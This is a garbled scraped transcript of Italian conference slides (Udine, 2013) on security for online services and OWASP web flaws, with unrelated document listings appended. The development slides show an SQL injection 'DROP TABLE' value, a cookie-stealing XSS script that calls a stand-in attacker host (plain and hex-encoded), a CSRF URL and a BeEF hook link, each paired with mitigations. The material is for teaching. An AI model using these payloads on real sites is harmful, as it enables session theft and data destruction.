Gli aspe) fondamentali della sicurezza informa4ca per servizi eroga4 online. Udine, 30 novembre 2013 alessandro arciero

Dimensione: px
Iniziare la visualizzazioe della pagina:

Download "Gli aspe) fondamentali della sicurezza informa4ca per servizi eroga4 online. Udine, 30 novembre 2013 alessandro arciero arxway@me."

Transcript

1 Gli aspe) fondamentali della sicurezza informa4ca per servizi eroga4 online Udine, 30 novembre 2013 alessandro arciero 1

2 Premessa L argomento tra/ato è vas2ssimo e per essere affrontato nella sua interezza richiederebbe dei tempi incompa2bili con quelli messi a disposizione dall evento. Pertanto sarà presentata una carrellata delle maggiori cri2cità riscontrate personalmente nell di security assessment rispe/o ad archite/urali e implementa2vi dell infrastru/ura con par2colare approfondimento sulla parte socware di frontend dei servizi. 2

3 Premessa Gli argomen2 tra/a2 valgono ovviamente in qualsiasi contesto ma diventano maggiormente cri2ci in scenari dove l azienda offre servizi online (principalmente e- commerce) per i seguen2 mo2vi: 1) l azienda espone più o meno dire/amente i propri da2 finalizza2 al compimento del business o del servizio 2) Acquisisce maggiore visibilità e diventa un target appe2bile 3) Si dota di una stru/ura di supporto e/o customer service che essendo, per sua natura, un di relazioni umane, rappresenta un fa/ore di rischio molto cri2co. 3

4 Sicurezza. Anche il conce/o di sicurezza è molto esteso in questo contesto si intendono problema2che rela2ve a: Perdita del dato Furto del dato Alterazione del dato Mancata disponibilità del dato. Il conce/o di dato è volutamente generico. Per intenderci con un esempio, un defacement di un sito web è un alterazione. L impossibilità di accedere ai da2 a causa di latenze prolungate introdo/e da problema2che di networking o socware, per esempio, è una indisponibilità del dato. 4

5 Sicurezza. Conseguenze dire/e: Perdite economiche più o meno direje e proporzionate all en4tà del danno Conseguenze in ambito penale (es: Il D.Lgs 196/2003) Perdita di reputazione 5

6 Base da2: cri2cità più frequen2 1. Accesso dire/o al database aziendale da parte del socware che eroga il servizio. Eventuali problema2che di qualsiasi natura si ripercuoto sulla base da2 fondamentale. 2. Aggiornamento sincrono della base da2 tra il database posto online e quello interno aziendale. Stesse problema2che del punto precedente anche se generalmente mi2gate. 3. Esposizione di informazioni oltre le reali necessità. Esponendo, spesso per comodità o pigrizia, intere tabelle contenen2 anche da2 non stre/amente necessari. 4. Mancanza di meccanismi transazionali che rende la base da2 par2colarmente vulnerabile ad a/acchi DoS che possono causare la perdita di consistenza del DB.. (es: myisam storage engine in mysql) 5. Informazioni più cri2che (es: password) non cifrate o cifrate senza salt adegua2 (facilmente aggredibili perciò con tecniche brute force, per esempio mediante l uso di rainbow table) 6

7 Base da2: cri2cità più frequen2 6. Password di accesso deboli 7. Eccesso di privilegi nel concedere autorizzazioni agli uten2 che accedono alla base da2 8. Accessi trusted incondiziona2 ad utenze locali Più nel dejaglio L integrità dei da2 è garan2ta solo dal socware di ges2one e non da meccanismi interni del DB (integrità referenziale ) Errori di design e/o archite/ura della stru/ura da2 associa2 ad errori nelle query di interrogazioni. 7

8 Base da2: cri2cità più frequen2 10. Conservazione di da4 senza ojemperare alle norme di legge e/o raccomandazioni. (PCI- DSS, Il D.Lgs 196/2003 ) 11. MANCANZA DI PIANI DI BACKUP E DISASTER RECOVERY SERI! 8

9 Networking: cri2cità più frequen2 Mancato o insufficiente isolamento tra le risorse che forniscono i servizi e il resto della stru/ura (stesso dominio di broadcast, traffic filtering insufficiente o assente). Mancata solidità dei collegamen2 tra le componen2 che cos2tuiscono il servizio, sopra/u/o tra: Tra istanze di database distribui2 che scambiano da2 tra developer/sys admin e la stru/ura (connessioni non cifrate, port forwarding non sele)vi ) In presenza di prote/e (VPN) spesso vengono permessi meccanismi di split tunneling 9

10 Networking: cri2cità più frequen2 Un aspe/o rilevante spesso so/ovalutato è la mancata configurazione degli appara2 di networking per garan2re (riservare) una banda minima tra le en2tà di controllo e ges2one del servizio e il servizio stesso. E frequente, durante a/acchi DoS miran2 sopra/u/o a impedire la fruizione del servizio tramite flood del canale di comunicazione, che un intera stru/ura rimanga isolata per ore senza poter intervenire e conoscere l in a/o! 10

11 Audi2ng, logging. Sebbene l argomento sia vasto e richieda ben altro approfondimento è necessario riportare come molte delle problema2che nascano da una mancato controllo dell ad ogni livello delle componen2 che erogano il servizio. Spesso manca anche la più basilare raccolta (!!!!) e analisi dei log. Senza addentrarsi a fondo, non è ammissibile che non vengano considera2 ai fini della sicurezza gli even2 più rilevan2 come ripetu2 e frequen2 tenta2vi falli2 di: 1. instaurare una VPN 2. accedere ad un area prote/a del sito 3. effe/uare transazioni di danaro 4. 11

12 di CRM e supporto: cri2cità più frequen2 L interazione tra il personale impiegato e il pubblico fruitore del servizio, in generale rappresenta probabilmente la variabile più difficile da controllare dal punto di vista della sicurezza. fondamentali da seguire e realizzare: Training rigoroso e approfondito di tu/o il personale circa i comportamen2 nella relazione con il cliente e nelle informazioni che possono essere condivise a/raverso i canali messi a disposizione ( , chat ) e sulle tecniche più diffuse di phishing. Spesso il personale tende a riconoscere una certa confidenza all interlocutore abile nell approccio e concedere più del dovuto. 12

13 di CRM e supporto: cri2cità più frequen2 Un sistema robusto di tracking e di iden2ficazione rigorosa dei flussi alla base dei offerta. L ambiguità nell iden2ficare e definire o step del flow del business facilita gli errori degli operatori. Sistemi robus2 E VELOCI per l iden2ficazione del cliente. (per esempio l accesso ad una chat di supporto deve essere auten2cata). Addestramento circa l u2lizzo degli strumen2 fondamentali e sui comportamen2 da tenere: u2lizzo corre/o del browser, del client di posta. 13

14 ERRORI DELLE CONFIGURAZIONI dei socware server / client Un problema rilevante è quello della configurazione degli applica2vi server e client. Mol2 delle vulnerabilità a cui è esposto il servizio sono effe/o dire/o di errori di configurazione, per esempio del web server. Talvolta errori del socware che implementa le interfacce o la logica sono sfru/abili grazie ad errori determina2 dall sistemis2ca. Nell analisi più approfondita che segue si evidenzieranno alcuni casi tra i più diffusi. 14

15 ERRORI DELLE CONFIGURAZIONI dei socware server / client Un altro aspe/o importante è quello dell di SEO (Search Engine Op2miza2on). Talvolta l di del sito impone delle configurazioni complesse che possono nascondere degli errori che portano a vulnerabilità. L uso del modulo mod_rewrite di apache per la riscri/ura degli URL dopo cambiamen2 più o meno radicali della stru/ura del sito (allo scopo di mantenere ranking al2 nelle indicizzazioni di google per esempio) possono introdurre delle vulnerabilità molto pericolose. 15

16 CRITICITA : IL FRONTEND WEB Le maggiori problema2che so/o l aspe/o della sicurezza arrivano da errori socware provenien2 dal versante del frontend web. In par2colare, la mancata sani2zzazione e validazione dei da2 di INPUT, rappresentano in assoluto le maggiori minacce a tu/e le online. A tal proposito saranno riportate le TOP 10 vulnerabili2es OWASP (Open Web Applica2on Security Project). 16

17 DEVELOPMENT: SQL injec2on E ancora oggi la principale tecnica di successo per carpire informazioni dai database dei servizi offer2. La tecnica consiste nell inie/are codice SQL nelle normali query di servizio. Il risultato può arrivare al completo controllo di tu/o il database. $numero_righe_per_pagina = $_GET[ nextpage ]; $sql_query= SELECT * FROM tbl_prodotti OFFSET. $numero_righe_per_pagina; La variabile nextpage non è ges4ta. Questo perme/e di appendere una qualsiasi query a quella di selezione. 17

18 DEVELOPMENT: SQL injec2on Per esempio alla variabile nextpage viene assegnato il seguente valore : 50; DROP table tbl_users; 50 sono il numero di righe per pagina da visualizzare ; chiude la query DROP TABLE users; è la query inie/ata il cui esito è prevedibile. Dopo l injec2on la query diventa: SELECT * FROM tbl_prodotti OFFSET 50; DROP TABLE tbl_users; 18

19 DEVELOPMENT: cookie e sessioni La quasi totalità delle aree riservate utilizza dei cookie per creare delle sessioni autenticate. Il cookie viene inviato al client settando fondamentalmente i seguenti parametri: domain: il dominio per il quale il cookie è valido. path: il path sul server che viene interessato dal cookie expiration: il tempo di validità e quindi di durata della sessione (generalmente fino alla chiusura del browser) flag: tra cui il più importante è HTTPONLY. Tale flag è molto importante poiché se settato non permette a codice javascript di leggere il valore del cookie mitigando il pericolo di molti attacchi. 19

20 DEVELOPMENT: cookie e sessioni Domain, path devono essere molto conservativi per circoscrivere al massimo l ambito di utilizzo e limitare i rischi, soprattutto su server non dedicati. Il flag HTTPONLY deve essere settato per limitare l efficacia alcuni attacchi classici molto diffusi. (es: furto di cookie di sessione attraverso tecniche che saranno illustrate in seguito) 20

21 DEVELOPMENT: XSS XSS (cross site scrip2ng) è una tecnica che perme/e di inserire codice html/javascript all interno di una pagina web e di poter eseguire tale codice sul client. L origine del problema è sempre la mancata sani2zzazione di un dato di INPUT. La vulnerabilità è localizzata sul server benchè il danno causato si ripercuota sul client. Questa vulnerabilità, a differenza dell SQL injec2on, per o/enere successo necessità della collaborazione dell utente che visita il sito. L a/accante induce la a cliccare su un link che porta al sito nascondendo però al suo interno il codice che verrà eseguito sul client. 21

22 DEVELOPMENT: XSS La funzionalità di ricerca dei contenu2 in un sito rappresenta il caso classico. Il risultato della ricerca è preceduto, nella visualizzazione nella pagina di risposta, della chiave di ricerca u2lizzata. Se la chiave di ricerca è del codice e non è sani2zzato, verrà eseguito sul browser. Si consideri, per esempio, di u2lizzare come chiave di ricerca a la seguente stringa: <script> var img = new Image(); img.src= "http://www.attaccante.com/show_cookie.php?cookie=" + document.cookie </script> Il client della tenta di caricare l immagine dal sito a/accante.com che riceve via GET la variabile cookie= con il valore del cookie, potenzialmente di una sessione auten2cata sul sito affe/o. (A/acco efficace se il flag HTTPONLY del cookie non è se/ato) 22

23 DEVELOPMENT: XSS Gli step dell a/acco: 1) L a/accante induce la a cliccare un url sul server vulnerabile passando la variabile di ricerca con del codice javascript. Es: h/p://www.sitovulnerabile.com?search=<script> var img = new Image(); img.src= "http://www.attaccante.com/show_cookie.php?cookie=" + document.cookie </script> L url può essere mascherato opportunamente codificato (es: hex). L url diventa: h/p://www.sitovulnerabile.com?search= %3C%73%63%72%69%70%74%3E %20%76%61%72%20%69%6D%67%20%3D%20%6E%65%77%20%49%6D%61%67%65%28%29%3B%0B %69%6D%67%2E%73%72%63%3D%20%22%68%74%74%70%3A%2F%2F%77%77%77%2E %61%74%74%61%63%63%61%6E%74%65%2E%63%6F%6D%2F%73%68%6F%77%5F%63%6F%6F%6B %69%65%2E%70%68%70%3F%63%6F%6F%6B%69%65%3D%22%20%2B%20%64%6F%63%75%6D %65%6E%74%2E%63%6F%6F%6B%69%65%0A%3C%2F%73%63%72%69%70%74%3E%20%0A 23

24 DEVELOPMENT: XSS Gli step dell a/acco: 2) La cliccando sull URL effe/ua una chiamata al sito vulnerabile che può perme/e di effe/uare una richiesta a quello dell a/accante passando con document.cookie la cookie nella variabile cookie passata via GET, magari di una sessione auten2cata sul server vulnerabile). L a/accante, o/enuto il valore del cookie, accede al server vulnerabile con i privilegi di sessione della Questo 4po di ajacco è il più diffuso in assoluto e ha coinvolto storicamente quasi la totalità dei si4 di ecommerce o di servizi a pagamento (amazon, ebay, facebook ). Per esperienza personale 1 sito su 4 ne è afflijo. Spesso gli acquis4 o ricariche di denaro ad account terzi sono sta4 effejua4 materialmente (e inconsapevolmente) dall utente vi)ma. Se il valore di INPUT non validato viene inserito in un database l XSS diventa persistent e non serve nemmeno più passarlo alla vi)ma con tecniche di phishing. 24

25 DEVELOPMENT: XSS REMEDIATION/MITIGATION PLAN I browser moderni in mol2 casi, ma non in riconosco una buona quan2tà di ques2 tenta2vi di a/acco, ma rimangono ancora numerose possibilità di successo. E facile intuire che se la sessione rubata è di amministrazione (supporto, customer service...) il danno può essere fatale. La formazione del personale sul problema e le sue origini, la messa a punto degli strumen2 adegua2, aggiornamento dei browser alle versioni più recen2, se/aggi conserva2vi sulla sicurezza, installazione di plugin come l NETCRAFT (an2 XSS), SONO ASPETTI FONDAMENTALI DA NON TRASCURARE. 25

26 DEVELOPMENT: XST XST (cross site tracing) è una tecnica di XSS che sfru/a un errore di configurazione del web server, ovvero il metodo TRACE abilitato anche su server di produzione, per o/enere, per esempio i cookie di sessione, anche nei casi in cui quest ul2ma è configurata corre/amente (h/ponly flag se/ato) Il metodo TRACE è generalmente u2lizzato a fine di debugging. In pra2ca effe/ua un echo di ritorno al client tu/e le richieste effe/uate al server. Il problema nasce perché il server ritorna nell output anche i valori dei cookie che possono essere tramite l XSS all a/accante. 26

27 DEVELOPMENT: XST Step dell a/acco: 1) l a/accante forgia una pagina web u2lizzando una chiamata XMLH/pRequest() con il metodo TRACE anziché il tradizionale GET. 2) L a/accante induce un visitatore a visitare la pagina web cosi forgiata. 3) La pagina forgiata dell a/accante recupera i valori dei cookie (sessione) dall output del server con il TRACE abilitato e lo invia all a/accante. L a/acco funziona perché anche se il cookie ha il flag HTTPONLY se/ato, il codice javascript recupera il dato dall output del server con il metodo TRACE abilitato. MITIGATION/REMEDIATION PLAN Disabilitare il metodo TRACE! 27

28 DEVELOPMENT: CSRF Cross- Site Request Forgery (CSRF), CWE 3252, è una tecnica che sfru/a il XSS (e non solo) per far eseguire delle operazioni sul server ad una che ha una sessione su un server di interesse dell a/accante. E una tecnica molto insidiosa ed u2lizzata in ogni ambito, compreso social network, chat etc.. L a/accante ricava l url per compiere una determinata operazione di suo interesse (acquistare un prodo/o, effe/uare trasferimento di denaro) e induce una potenziale che ha i privilegi per compiere l operazione, a visitare la pagina indicata dall URL. 28

29 DEVELOPMENT: CSRF Si consideri a 2tolo di esempio il seguente URL: h/p://www.ecommerce.com/trans.php?username=ajacker&ac4on=add&value=100 Che ricarica l utente a/acker di 100. A/acker invia il link alla che avendo la sessione effe/ua l operazione con successo, ricaricandolo. MITIGATION/REMEDIATION PLAN Questo 2po di a/acco può essere evitato inserendo un token che viene con2nuamente scambiato tra server e client. Una chiamata GET o POST che non por2 con se il token non ha successo. Perciò azioni invocate da form o url forgia2 ad hoc vengono ignorate. 29

30 DEVELOPMENT: Unrestricted Upload of File with Dangerous Type Benchè questa vulnerabilità (CWE- 434) sia meno frequente è forse la peggiore. La possibilità di fare un upload di documen2 in una directory sfogliabile (dentro la documentroot del webserver) senza verificare almeno il filetype è una delle situazioni peggiori. L a/accante effe/ua un upload di file eseguibili o script e li esegue. Le conseguenze sono immaginabili. MITIGATION/REMEDETION PLAN Spostare le directory di upload all esterno della documentroot, verificare il filetype (es: png, jpg, pdf ) sono operazioni necessarie. 30

31 DEVELOPMENT: Exposed Dangerous Method or Func2on (CWE- 749). Questa vulnerabilità è figlia della superficialità e della trascuratezza. E abbastanza diffusa sopra/u/o da quando è frequente l uso di Ajax (Asynchronous JavaScript and XML). Accade spesso che script invoca2 solo in chiamate asincrone (ma non solo, mi riferisco al caso più frequente) dal codice vero e proprio che disegna le pagine, non siano opportunamente e quindi sfogliabili senza privilegi da chiunque. Riporto uno script PHP tra/o da un caso reale: useradd.php?user='+user +'&name=' + name + '&surname=' + surname +'; Lo script esterno, incluso da una pagina corre/amente prote/a, era disponibile liberamente, senza alcuna auten2cazione. 31

32 DEVELOPMENT: Informa2on Exposure Through Debugger Informa2ons (CWE- 215). La modalità di debug in produzione può rappresentare una minaccia serissima. Riportare gli errori in un server di produzione può comportare l esposizione di informazioni riguardan2: Percorsi sul file system e stru/ura dello stesso Logica del socware, errori del codice, mancate validazioni e controlli Tipo e versione di socware u2lizzato Stru/ura del database e delle query di interrogazione. 32

33 DEVELOPMENT: Client- Side Enforcement of Server- Side Security (CWE- 602). Spesso l input è validato lato client da codice javascript. Per esempio la forma/azione di date, piu/osto che di indirizzi etc nelle form è un valido ausilio per lo user che le completa MA NON PUO SOSTITUIRE LA VALIDAZIONE LATO SERVER. E un errore comune e devastante. Le stringhe di input passate dall a/accante che rimuove il codice client side sono inserite generalmente as is in un database. Le conseguenze sono immaginabili. Permanet XSS, SQL injec2on. 33

34 DEVELOPMENT: Exposure of Backup File to an Unauthorized Control Sphere (CWE- 530). Un backup periodico (per esempio il dump di un database) viene schedulato e salvato in una directory esposta al browsing. Con tool come DirBuster (h/p://www.owasp.org) è possibile scovare il percorso, il nome e o/enere cosi i da2 di tu/o il database. 34

35 CONSIDERAZIONI FINALI La stragrande maggioranza delle problema2che riscontrate ricade in in quelle presentate. Ecco le 10 OWASP per l anno 2013: 35

36 CONSIDERAZIONI FINALI Una problema2ca trasversale a gli affronta2 è quella dell di SOCIAL ENGINEERING che spesso è l elemento vincente di chi conduce qualsiasi a/acco. Le phishing campaign a/raverso mail o social network possono essere condo/e e automa2zzate su qualsiasi scala a/raverso socware e spesso sono le tecniche che portano i risulta2 migliori poiché manca ancora una cultura e una adeguata preparazione ad approcciare un mondo di servizi offer2 online. Ho personalmente constatato come sia semplice ingannare o indurre in errore chiunque operi nel se/ore a prescindere dalla cultura personale o dall importanza del ruolo svolto. 36

37 CONSIDERAZIONI FINALI Riporto sempre l esempio dei vari sistemi di chat online dire/amente nel browser che si stanno sempre più diffondendo e che vengono u2lizza2 in mol2ssimi contes2, dal supporto prevendita a quello post vendita. IN TUTTI i casi durante l di social engineering come penetra2on tester, sono riuscito ad indurre l operatore a cliccare su un link e a prendere possesso del browser e in alcuni casi di o/enere una shell sul computer dell operatore. 37

38 CONSIDERAZIONI FINALI Per concre2zzare con un esempio quanto riportato, porto ad esempio BEEF (Browser Exploita2on Framework rilasciato so/o licenza GPL h/p://beefproject.com). E sufficiente cliccare su un link apparentemente regolare (nome a parte J ) come il seguente, su cui è installata la parte server di Beef: h/p://a/acker_beef_server/support/index.html per o/enere il controllo del browser della che diventa l inconsapevole ve/ore per l a/acco al server dei servizi. Il server è potenzialmente compromesso. 38

39 CONSIDERAZIONI FINALI La console di controllo di beef Open Source Day, 30 novembre

40 OPENSOURCE TOOLS Gli strumen2 per effe/uare dei security assessment sono mol2 anche se non di immediata fruizione. In mol2 casi un uso acri2co o poco consapevole degli stessi porta a non riconoscere pericoli gravi o a trovarne ovunque (falsi posi2vi). Tale lavoro dovrebbe essere fa/o da un professionista almeno con periodicità annuale o dopo importan2 cambiamen2 nella stru/ura che eroga il servizio, tu/avia delle verifiche periodiche effe/uate da personale con un minimo di preparazione possono almeno riconoscere e scovare le minacce più gravi. Esistono versioni commerciali di tools che offrono interfacce semplificate e automa2smi molto comodi ma in ambito free o opensource si trovano degli strumen2 fondamentali e molto poten2. 40

41 OPENSOURCE TOOLS E evidente che il corre/o funzionamento di tu/o l apparato erogante il servizio dipende da i fa/ori in gioco: design, proge/azione, implementazione. Tu/o ciò vale per la parte sistemis2ca di internetworking e di sviluppo del codice. Tu/avia l u2lizzo di strumen2 di diagnos2ca rappresentano una opportunità di valutare il lavoro eseguito e andrebbero sempre prima di entrare in produzione con l Un altro aspe/o fondamentale è la maggiore consapevolezza e conoscenza che ogni player coinvolto nell acquisisce a/raverso questo 2po di 41

42 OPENSOURCE TOOLS Oltre ai tools già menziona2, segnalo: hjps://www.owasp.org/index.php/main_page Il sito fondamentale. Vi si trovano cen2naia di tools, alcuni di assoluto valore. Distribuzione Backtrack (h/p://www.backtrack- linux.org)include migliaia di tool mol2ssimi dei quali rilascia2 so/o licenza BSD o GPL. W3af Web Applica2on A/ack and Audit Framework (h/p://w3af.org) rilasciata so/o licenza GPLv2. E uno strumento insos2tuibile, presenta una interfaccia grafica so/o varie pia/aforme. Effe/ua dei test per mol2ssime vulnerabilità. Aggiornato tramite plugin e uno degli strumen2 principe dei pentester. 42

43 OPENSOURCE TOOLS Principali tools consiglia2 per l analisi: Sqlmap (h/p://h/p://sqlmap.org). Riferimento per scovare le vulnerabilità di SQL injec2on. (GPLv2) Xeno4x (h/ps://www.owasp.org/index.php/owasp_xeno2x_xss_exploit_framework) Strumento fondamentale per scovare vulnerabilità di cross site scrip2ng 43

44 CONCLUSIONI dei servizi online e creare una stru/ura adeguata per ges2rli è un compito complesso e difficile, sopra/u/o so/o il profilo della sicurezza. A prescindere dalle scelte tecnologiche (argomento importante ma al di fuori dello scopo dell intervento) effe/uate, è necessario una pianificazione me2colosa di ogni fase. Spesso invece, sopra/u/o nel caso dell e- commerce, l approccio virtuale al business reale viene visto come un alterna2va meno impegna2va dello store fisico. Se è probabilmente vero so/o alcuni non lo è so/o quello dell inves2mento in termini di competenze, pianificazione. La sicurezza è un aspe/o spesso trascurato e la possibilità di subire danni è percepito come un evento remoto e improbabile. 44

45 CONCLUSIONI La consapevolezza si acquisisce purtroppo solo a danno avvenuto. A volte basta una piccola dimen2canza, un errore apparentemente insignificante per esporre una vulnerabilità che non inficia dire/amente la funzionalità e la regolarità del servizio ma che è sufficiente, per fare un esempio, a far finire il sito nella black list di google fermando di fa/o qualsiasi anche per giorni. 45

46 DOMANDE? GRAZIE 46

Attacchi alle applicazioni web: SQL injection e Cross-site scripting (XSS)

Attacchi alle applicazioni web: SQL injection e Cross-site scripting (XSS) UNIVERSITÀ DEGLI STUDI DI CATANIA Facoltà di Ingegneria Corso di laurea Specialistica in Ingegneria Informatica Tesina di Sicurezza nei Sistemi informativi Simona Ullo Attacchi alle applicazioni web: SQL

Dettagli

Un contesto dinamico in con-nua evoluzione

Un contesto dinamico in con-nua evoluzione Un contesto dinamico in con-nua evoluzione Il se3ore bancario è un target par*colarmente appe-bile per i cybercriminali, per molteplici finalità So3razione denaro dai con* delle vi9me So;razione e divulgazione

Dettagli

Laboratorio di reti II: Problematiche di sicurezza delle reti

Laboratorio di reti II: Problematiche di sicurezza delle reti Laboratorio di reti II: Problematiche di sicurezza delle reti Stefano Brocchi brocchi@dsi.unifi.it 30 maggio, 2008 Stefano Brocchi Laboratorio di reti II: Sicurezza web 30 maggio, 2008 1 / 43 La sicurezza

Dettagli

Indice register_globals escaping

Indice register_globals escaping 1 Indice La sicurezza delle applicazioni web Le vulnerabilità delle applicazioni web La sicurezza in PHP: La direttiva register_globals Filtrare l'input Filtrare l'output (escaping) SQL Injection Cross

Dettagli

Brand reputa+on: lo specchio del Revenue Tina Ingaldi Consulente Revenue e Marke5ng

Brand reputa+on: lo specchio del Revenue Tina Ingaldi Consulente Revenue e Marke5ng s Brand reputa+on: lo specchio del Revenue Tina Ingaldi Consulente Revenue e Marke5ng Brand Reputation La reputazione di un marchio passa oggi anche a

Dettagli

Penalizzazioni SEO di Google Come evitarle, riconoscerle, recuperare

Penalizzazioni SEO di Google Come evitarle, riconoscerle, recuperare Penalizzazioni SEO di Google Come evitarle, riconoscerle, recuperare Padova 08/11/2013 Fabio Su)o Fabio Su)o h)p://www.linkedin.com/in/su)o h)p://twi)er.com/#!/fsu)o h)p://www.facebook.com/fsu)o Penalizzazioni

Dettagli

Fenice Web. Domande frequen. #6 - Luglio 2015

Fenice Web. Domande frequen. #6 - Luglio 2015 Spe.le Cliente, ecco il sesto numero di questo noziario. Questo noziario verrà spedito automacamente a tu i Clien di Fenice. Se qualcuno desidera NON riceverlo deve semplicemente comunicare la propria

Dettagli

Come o2enere più Clien5, più Soldi e più Libertà nel tuo business di Consulente: Processi ed esempi reali

Come o2enere più Clien5, più Soldi e più Libertà nel tuo business di Consulente: Processi ed esempi reali Come o2enere più Clien5, più Soldi e più Libertà nel tuo business di Consulente: Processi ed esempi reali Benvenuto nel webinar! www.acquisireclien5.com O2enere più traffico: come portare alle tue pagine

Dettagli

LA RIVOLUZIONE DIGITALE E LE NUOVE OPPORTUNITÁ PER LE IMPRESE

LA RIVOLUZIONE DIGITALE E LE NUOVE OPPORTUNITÁ PER LE IMPRESE LA RIVOLUZIONE DIGITALE E LE NUOVE OPPORTUNITÁ PER LE IMPRESE Durata: 24 ore Calendario: 8 appuntamen semanali (dalle 19.30 alle 22.30) a parre dal mese di maggio Prezzo: 100,00 + iva, grazie ai contribu

Dettagli

RUBRICA ERP L implementazione e la gesone di un ERP può seguire i principi dell IT Governance? L IT Governance applicata ai sistemi ERP

RUBRICA ERP L implementazione e la gesone di un ERP può seguire i principi dell IT Governance? L IT Governance applicata ai sistemi ERP RUBRICA ERP L implementazione e la gesone di un ERP può seguire i principi dell IT Governance? L IT Governance applicata ai sistemi ERP INDICE Introduzione Intervista all Ing. Paolo Di Mar!no, Responsabile

Dettagli

Product Overview. ITI Apps Enterprise apps for mobile devices

Product Overview. ITI Apps Enterprise apps for mobile devices Product Overview ITI Apps Enterprise apps for mobile devices ITI idea, proge2a e sviluppa apps per gli uten6 business/enterprise che nell ipad, e nelle altre pia2aforme mobili, possono trovare un device

Dettagli

Navigazione automatica e rilevazione di errori in applicazioni web

Navigazione automatica e rilevazione di errori in applicazioni web Politecnico di Milano Navigazione automatica e rilevazione di errori in applicazioni web Relatore: Prof. Stefano Zanero Fabio Quarti F e d e r i c o V i l l a A.A. 2006/2007 Sommario Obiettivo: Illustrare

Dettagli

LA RIVOLUZIONE DIGITALE E LE NUOVE OPPORTUNITÁ PER LE IMPRESE

LA RIVOLUZIONE DIGITALE E LE NUOVE OPPORTUNITÁ PER LE IMPRESE LA RIVOLUZIONE DIGITALE E LE NUOVE OPPORTUNITÁ PER LE IMPRESE Durata: 24 ore Calendario: 8 appuntamen semanali (dalle 19.30 alle 22.30) a parre dal mese di maggio Prezzo: 100,00 + iva, grazie ai contribu

Dettagli

Django - WebSocket. Web in real- 3me. Saverio Patruno ConoscereLinux - LUG Modena. #linuxdaymo15

Django - WebSocket. Web in real- 3me. Saverio Patruno ConoscereLinux - LUG Modena. #linuxdaymo15 Django - WebSocket Web in real- 3me Saverio Patruno ConoscereLinux - LUG Modena #linuxdaymo15 Python Anni 90 Guido van Rossum per hobby crea un linguaggio di facile comprensione, con curva di apprendimento

Dettagli

VALUTARE IL BENEFICIO DELL IMPLEMENTAZIONE DI ITIL Analisi di Andrea Cavazza, Manager di HSPI Adoare ITIL: un inves mento u le?

VALUTARE IL BENEFICIO DELL IMPLEMENTAZIONE DI ITIL Analisi di Andrea Cavazza, Manager di HSPI Adoare ITIL: un inves mento u le? ANALISI 3 oobre 2011 VALUTARE IL BENEFICIO DELL IMPLEMENTAZIONE DI ITIL Analisi di Andrea Cavazza, Manager di HSPI Adoare ITIL: un inves mento u le? Nell auale periodo di crisi economica, è sempre maggiore

Dettagli

Attacchi alle Applicazioni Web

Attacchi alle Applicazioni Web Attacchi alle Applicazioni Web http://www.infosec.it info@infosec.it Relatore: Matteo Falsetti Webbit03 Attacchi alle Applicazioni Web- Pagina 1 Applicazioni web: definizioni, scenari, rischi ICT Security

Dettagli

Do#Com. Bagne, StampaOffice

Do#Com. Bagne, StampaOffice Do#Com Bagne, StampaOffice La Vision Customer first! L impera

Dettagli

IL VALORE DEL CLIENTE NELLA GESTIONE DEI PROCESSI AZIENDALI. Ing. Andrea Giaconi

IL VALORE DEL CLIENTE NELLA GESTIONE DEI PROCESSI AZIENDALI. Ing. Andrea Giaconi IL VALORE DEL CLIENTE NELLA GESTIONE DEI PROCESSI AZIENDALI Ing. Andrea Giaconi Il cliente chi è? È il giudice ul=mo della mia impresa Stringe relazioni Il suo comportamento varia nel tempo Per ges=rlo

Dettagli

Soluzioni e Proge-! Datakey Software Engineering Srl 1

Soluzioni e Proge-! Datakey Software Engineering Srl 1 Soluzioni e Proge- 1 Datakey 30 anni di SoSware Datakey nasce Nel 1985, avente ad ogge0o l a2vità di proge0azione di servizi informa:ci opera trasformazioni orientate alla crescita; E cer:ficata ISO 9001

Dettagli

Esempio Cookie Policy

Esempio Cookie Policy Esempio Cookie Policy INFORMATIVA ESTESA SULL USO DEI COOKIE Uso dei cookie cascinaladoria.it o il Sito utilizza i Cookie per rendere i propri servizi semplici e efficienti per l utenza che visiona le

Dettagli

Gli strumen, social e l usabilità al servizio della scuola. Da MatchPoint a La Buona Scuola

Gli strumen, social e l usabilità al servizio della scuola. Da MatchPoint a La Buona Scuola Gli strumen, social e l usabilità al servizio della scuola Da MatchPoint a La Buona Scuola premessa Social media: tecnologie online che le persone u7lizzano per interagire e condividere contenu7 Potenzialmente

Dettagli

Corso di Informatica. Prerequisiti. Modulo T3 B3 Programmazione lato server. Architettura client/server Conoscenze generali sui database

Corso di Informatica. Prerequisiti. Modulo T3 B3 Programmazione lato server. Architettura client/server Conoscenze generali sui database Corso di Informatica Modulo T3 B3 Programmazione lato server 1 Prerequisiti Architettura client/server Conoscenze generali sui database 2 1 Introduzione Lo scopo di questa Unità è descrivere gli strumenti

Dettagli

AJAX. Goy - a.a. 2006/2007 Servizi Web 1. Cos'è il Web 2.0

AJAX. Goy - a.a. 2006/2007 Servizi Web 1. Cos'è il Web 2.0 AJAX Goy - a.a. 2006/2007 Servizi Web 1 Cos'è il Web 2.0 Web 2.0 = termine introdotto per la prima volta nel 2004 come titolo di una conferenza promossa dalla casa editrice O Reilly L'idea è che ci si

Dettagli

Elementi di Sicurezza e Privatezza Lezione 13 Web Security. Chiara Braghin

Elementi di Sicurezza e Privatezza Lezione 13 Web Security. Chiara Braghin Elementi di Sicurezza e Privatezza Lezione 13 Web Security Chiara Braghin Cookie e Sicurezza HTTP e i cookie (1) Vi ricordate? I Web server in genere sono stateless: una serie di richieste dallo stesso

Dettagli

Elementi di Sicurezza e Privatezza Lezione 13 Web Security. Chiara Braghin. Cookie e Sicurezza

Elementi di Sicurezza e Privatezza Lezione 13 Web Security. Chiara Braghin. Cookie e Sicurezza Elementi di Sicurezza e Privatezza Lezione 13 Web Security Chiara Braghin Cookie e Sicurezza 1 HTTP e i cookie (1) Vi ricordate? I Web server in genere sono stateless: una serie di richieste dallo stesso

Dettagli

Attacco alle WebMail basate su Memova: tampering dei parametri di inoltro automatico

Attacco alle WebMail basate su Memova: tampering dei parametri di inoltro automatico Attacco alle WebMail basate su Memova: tampering dei parametri di inoltro automatico Rosario Valotta Matteo Carli Indice Attacco alle WebMail basate su Memova:... 1 tampering dei parametri di inoltro automatico...

Dettagli

Application Assessment Applicazione ARCO

Application Assessment Applicazione ARCO GESI Application Assessment Applicazione ARCO Milano Hacking Team S.r.l. http://www.hackingteam.it Via della Moscova, 13 info@hackingteam.it 20121 MILANO (MI) - Italy Tel. +39.02.29060603 Fax +39.02.63118946

Dettagli

Proge&are un sito Web

